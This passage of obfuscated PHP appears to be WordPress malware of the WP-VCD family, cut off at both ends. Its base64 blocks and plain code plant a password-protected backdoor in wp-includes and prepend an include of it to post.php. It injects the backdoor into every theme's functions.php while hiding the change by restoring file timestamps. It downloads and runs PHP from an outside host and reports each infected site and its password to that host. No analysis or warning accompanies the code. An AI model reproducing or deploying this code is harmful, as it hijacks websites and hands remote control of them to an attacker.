Vjl3ZFhSZlkyOXVkR1Z1ZEhNb0ozZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdDaUFnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ1pXeHpaV2xtSUNna2RHMXdZMjl1ZEdWdWRDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdpYUhSMGNEb3ZMM2QzZHk1MVlYQnBiRzh1Y0hjdlkyOWtaUzV3YUhBaUtTQWdRVTVFSUhOMGNtbHdiM01vSkhSdGNHTnZiblJsYm5Rc0lDUjNjRjloZFhSb1gydGxlU2tnSVQwOUlHWmhiSE5sSUNrZ2V3b0thV1lnS0hOMGNtbHdiM01vSkhSdGNHTnZiblJsYm5Rc0lDUjNjRjloZFhSb1gydGxlU2tnSVQwOUlHWmhiSE5sS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCbGVIUnlZV04wS0hSb1pXMWxYM1JsYlhCZmMyVjBkWEFvSkhSdGNHTnZiblJsYm5RcEtUc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lFQm1hV3hsWDNCMWRGOWpiMjUwWlc1MGN5aEJRbE5RUVZSSUlDNGdKM2R3TFdsdVkyeDFaR1Z6TDNkd0xYUnRjQzV3YUhBbkxDQWtkRzF3WTI5dWRHVnVkQ2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR2xtSUNnaFptbHNaVjlsZUdsemRITW9RVUpUVUVGVVNDQXVJQ2QzY0MxcGJtTnNkV1JsY3k5M2NDMTBiWEF1Y0dod0p5a3BJSHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCQVptbHNaVjl3ZFhSZlkyOXVkR1Z1ZEhNb1oyVjBYM1JsYlhCc1lYUmxYMlJwY21WamRHOXllU2dwSUM0Z0p5OTNjQzEwYlhBdWNHaHdKeXdnSkhSdGNHTnZiblJsYm5RcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR2xtSUNnaFptbHNaVjlsZUdsemRITW9aMlYwWDNSbGJYQnNZWFJsWDJScGNtVmpkRzl5ZVNncElDNGdKeTkzY0MxMGJYQXVjR2h3SnlrcElIc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektDZDNjQzEwYlhBdWNHaHdKeXdnSkhSdGNHTnZiblJsYm5RcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ2ZTQUtDUWtLQ1FrZ0lDQWdJQ0FnSUdWc2MyVnBaaUFvSkhSdGNHTnZiblJsYm5RZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9JbWgwZEhBNkx5OTNkM2N1ZFdGd2FXeHZMblJ2Y0M5amIyUmxMbkJvY0NJcElDQkJUa1FnYzNSeWFYQnZjeWdrZEcxd1kyOXVkR1Z1ZEN3Z0pIZHdYMkYxZEdoZmEyVjVLU0FoUFQwZ1ptRnNjMlVnS1NCN0NncHBaaUFvYzNSeWFYQnZjeWdrZEcxd1kyOXVkR1Z1ZEN3Z0pIZHdYMkYxZEdoZmEyVjVLU0FoUFQwZ1ptRnNjMlVwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdWNGRISmhZM1FvZEdobGJXVmZkR1Z0Y0Y5elpYUjFjQ2drZEcxd1kyOXVkR1Z1ZENrcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektFRkNVMUJCVkVnZ0xpQW5kM0F0YVc1amJIVmtaWE12ZDNBdGRHMXdMbkJvY0Njc0lDUjBiWEJqYjI1MFpXNTBLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aEJRbE5RUVZSSUlDNGdKM2R3TFdsdVkyeDFaR1Z6TDNkd0xYUnRjQzV3YUhBbktTa2dld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUVCbWFXeGxYM0IxZEY5amIyNTBaVzUwY3loblpYUmZkR1Z0Y0d4aGRHVmZaR2x5WldOMGIzSjVLQ2tnTGlBbkwzZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aG5aWFJmZEdWdGNHeGhkR1ZmWkdseVpXTjBiM0o1S0NrZ0xpQW5MM2R3TFhSdGNDNXdhSEFuS1NrZ2V3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCQVptbHNaVjl3ZFhSZlkyOXVkR1Z1ZEhNb0ozZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdDaUFnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNCOUNna0paV3h6WldsbUlDZ2tkRzF3WTI5dWRHVnVkQ0E5SUVCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3loQlFsTlFRVlJJSUM0Z0ozZHdMV2x1WTJ4MVpHVnpMM2R3TFhSdGNDNXdhSEFuS1NCQlRrUWdjM1J5YVhCdmN5Z2tkRzF3WTI5dWRHVnVkQ3dnSkhkd1gyRjFkR2hmYTJWNUtTQWhQVDBnWm1Gc2MyVXBJSHNLSUNBZ0lDQWdJQ0FnSUNBZ1pYaDBjbUZqZENoMGFHVnRaVjkwWlcxd1gzTmxkSFZ3S0NSMGJYQmpiMjUwWlc1MEtTazdDaUFnSUNBZ0lDQWdJQ0FnQ2lBZ0lDQWdJQ0FnZlNCbGJITmxhV1lnS0NSMGJYQmpiMjUwWlc1MElEMGdRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLR2RsZEY5MFpXMXdiR0YwWlY5a2FYSmxZM1J2Y25rb0tTQXVJQ2N2ZDNBdGRHMXdMbkJvY0NjcElFRk9SQ0J6ZEhKcGNHOXpLQ1IwYlhCamIyNTBaVzUwTENBa2QzQmZZWFYwYUY5clpYa3BJQ0U5UFNCbVlXeHpaU2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQmxlSFJ5WVdOMEtIUm9aVzFsWDNSbGJYQmZjMlYwZFhBb0pIUnRjR052Ym5SbGJuUXBLVHNnQ2dvZ0lDQWdJQ0FnSUgwZ1pXeHpaV2xtSUNna2RHMXdZMjl1ZEdWdWRDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWduZDNBdGRHMXdMbkJvY0NjcElFRk9SQ0J6ZEhKcGNHOXpLQ1IwYlhCamIyNTBaVzUwTENBa2QzQmZZWFYwYUY5clpYa3BJQ0U5UFNCbVlXeHpaU2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQmxlSFJ5WVdOMEtIUm9aVzFsWDNSbGJYQmZjMlYwZFhBb0pIUnRjR052Ym5SbGJuUXBLVHNnQ2dvZ0lDQWdJQ0FnSUgwZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0I5Q24wS0NpOHZKSE4wWVhKMFgzZHdYM1JvWlcxbFgzUnRjQW9LQ2dvdkwzZHdYM1J0Y0FvS0NpOHZKR1Z1WkY5M2NGOTBhR1Z0WlY5MGJYQUtQejQ9JzsKCQoJJGluc3RhbGxfaGFzaCA9IG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10gLiBBVVRIX1NBTFQpOwoJJGluc3RhbGxfY29kZSA9IHN0cl9yZXBsYWNlKCd7JFBBU1NXT1JEfScgLCAkaW5zdGFsbF9oYXNoLCBiYXNlNjRfZGVjb2RlKCAkaW5zdGFsbF9jb2RlICkpOwoJCgoJCQkkdGhlbWVzID0gQUJTUEFUSCAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnd3AtY29udGVudCcgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ3RoZW1lcyc7CgkJCQkKCQkJJHBpbmcgPSB0cnVlOwoJCQkJJHBpbmcyID0gZmFsc2U7CgkJCWlmICgkbGlzdCA9IHNjYW5kaXIoICR0aGVtZXMgKSkKCQkJCXsKCQkJCQlmb3JlYWNoICgkbGlzdCBhcyAkXykKCQkJCQkJewoJCQkJCQkKCQkJCQkJCWlmIChmaWxlX2V4aXN0cygkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJykpCgkJCQkJCQkJewoJCQkJCQkJCQkkdGltZSA9IGZpbGVjdGltZSgkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyk7CgkJCQkJCQkJCQkKCQkJCQkJCQkJaWYgKCRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQoJCQkJCQkJCQkJewoJCQkJCQkJCQkJCWlmIChzdHJwb3MoJGNvbnRlbnQsICdXUF9WX0NEJykgPT09IGZhbHNlKQoJCQkJCQkJCQkJCQl7CgkJCQkJCQkJCQkJCQkkY29udGVudCA9ICRpbnN0YWxsX2NvZGUgLiAkY29udGVudCA7CgkJCQkJCQkJCQkJCQlAZmlsZV9wdXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcsICRjb250ZW50KTsKCQkJCQkJCQkJCQkJCXRvdWNoKCAkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyAsICR0aW1lICk7CgkJCQkJCQkJCQkJCX0KCQkJCQkJCQkJCQllbHNlCgkJCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQkJCSRwaW5nID0gZmFsc2U7CgkJCQkJCQkJCQkJCX0KCQkJCQkJCQkJCX0KCQkJCQkJCQkJCQoJCQkJCQkJCX0KCQkJCQkJCQkKCQkJCQkJCQkKCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGxpc3QyID0gc2NhbmRpciggJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyk7CgkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yZWFjaCAoJGxpc3QyIGFzICRfMikKCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAl7CgkJCQkJCQkJCQkJCQkJCQoKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKGZpbGVfZXhpc3RzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJykpCgkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgIHsKCQkJCQkJCQkJJHRpbWUgPSBmaWxlY3RpbWUoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKTsKCQkJCQkJCQkJCQoJCQkJCQkJCQlpZiAoJGNvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfMiAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQoJCQkJCQkJCQkJewoJCQkJCQkJCQkJCWlmIChzdHJwb3MoJGNvbnRlbnQsICdXUF9WX0NEJykgPT09IGZhbHNlKQoJCQkJCQkJCQkJCQl7CgkJCQkJCQkJCQkJCQkkY29udGVudCA9ICRpbnN0YWxsX2NvZGUgLiAkY29udGVudCA7CgkJCQkJCQkJCQkJCQlAZmlsZV9wdXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnLCAkY29udGVudCk7CgkJCQkJCQkJCQkJCQl0b3VjaCggJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnICwgJHRpbWUgKTsKCQkJCQkJCQkJCQkJCSRwaW5nMiA9IHRydWU7CgkJCQkJCQkJCQkJCX0KCgoKCgoKCgoJCQkJCQkJCQkJCWVsc2UKCQkJCQkJCQkJCQkJewoJCQkJCQkJCQkJCQkJLy8kcGluZyA9IGZhbHNlOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQl9CgkJCQkJCQkJCQkKCQkJCQkJCQl9CgoKCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCX0KCQkJCQkJCgkJCQkJaWYgKCRwaW5nKSB7CgkJCQkJCSRjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3LnVhcGlsby5jb20vby5waHA/aG9zdD0nIC4gJF9TRVJWRVJbIkhUVFBfSE9TVCJdIC4gJyZwYXNzd29yZD0nIC4gJGluc3RhbGxfaGFzaCk7CgkJCQkJCS8vQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnL3dwLWluY2x1ZGVzL2NsYXNzLndwLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3LnVhcGlsby5jb20vYWRtaW4udHh0JykpOwoJCQkJCX0KCQkJCQkKCQkJCQkJCQkJCQkJCQkJaWYgKCRwaW5nMikgewoJCQkJCQkkY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy51YXBpbG8uY29tL28ucGhwP2hvc3Q9JyAuICRfU0VSVkVSWyJIVFRQX0hPU1QiXSAuICcmcGFzc3dvcmQ9JyAuICRpbnN0YWxsX2hhc2gpOwoJCQkJCQkvL0BmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL2NsYXNzLndwLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3LnVhcGlsby5jb20vYWRtaW4udHh0JykpOwovL2VjaG8gQUJTUEFUSCAuICd3cC1pbmNsdWRlcy9jbGFzcy53cC5waHAnOwoJCQkJCX0KCQkJCQkKCQkJCQkKCQkJCQkKCQkJCX0KCQkKCgoKCj8+PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOz8+'; $GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media''modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes'); $GLOBALS['DIR_ARRAY'] = Array(); $dirs = Array(); $search = Array( Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => '$table_prefix'), ); function getDirList($path) { if ($dir = @opendir($path)) { $result = Array(); while (($filename = @readdir($dir)) !== false) { if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename)) $result[] = $path . '/' . $filename; } return $result; } return false; } function WP_URL_CD($path) { if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) ) { if (strpos($file, 'wp-vcd') === false) { $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file; file_put_contents($path . '/wp-includes/post.php', $file); //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uapilo.com/admin.txt')); } } } function SearchFile($search, $path) { if ($dir = @opendir($path)) { $i = 0; while (($filename = @readdir($dir)) !== false) { if ($i > MAX_ITERATION) break; $i++; if ($filename != '.' && $filename != '..') { if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey'])) { SearchFile($search, $path . '/' . $filename); } else { foreach ($search as $_) { if (strtolower($filename) == strtolower($_['file'])) { $GLOBALS['DIR_ARRAY'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . $filename); } } } } } } } if (is_admin() && (($pagenow == 'themes.php') || ($_GET['action'] == 'activate') || (isset($_GET['plugin']))) ) { if (isset($_GET['plugin'])) { global $wpdb ; } $install_code = 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nMTEyMjI4NDhhMTBmMWQwZWE1NTViY2RmNzczZjNlYjQnOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cudWFwaWxvLmNvbS9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3LnVhcGlsby5jb20vY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CgogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLi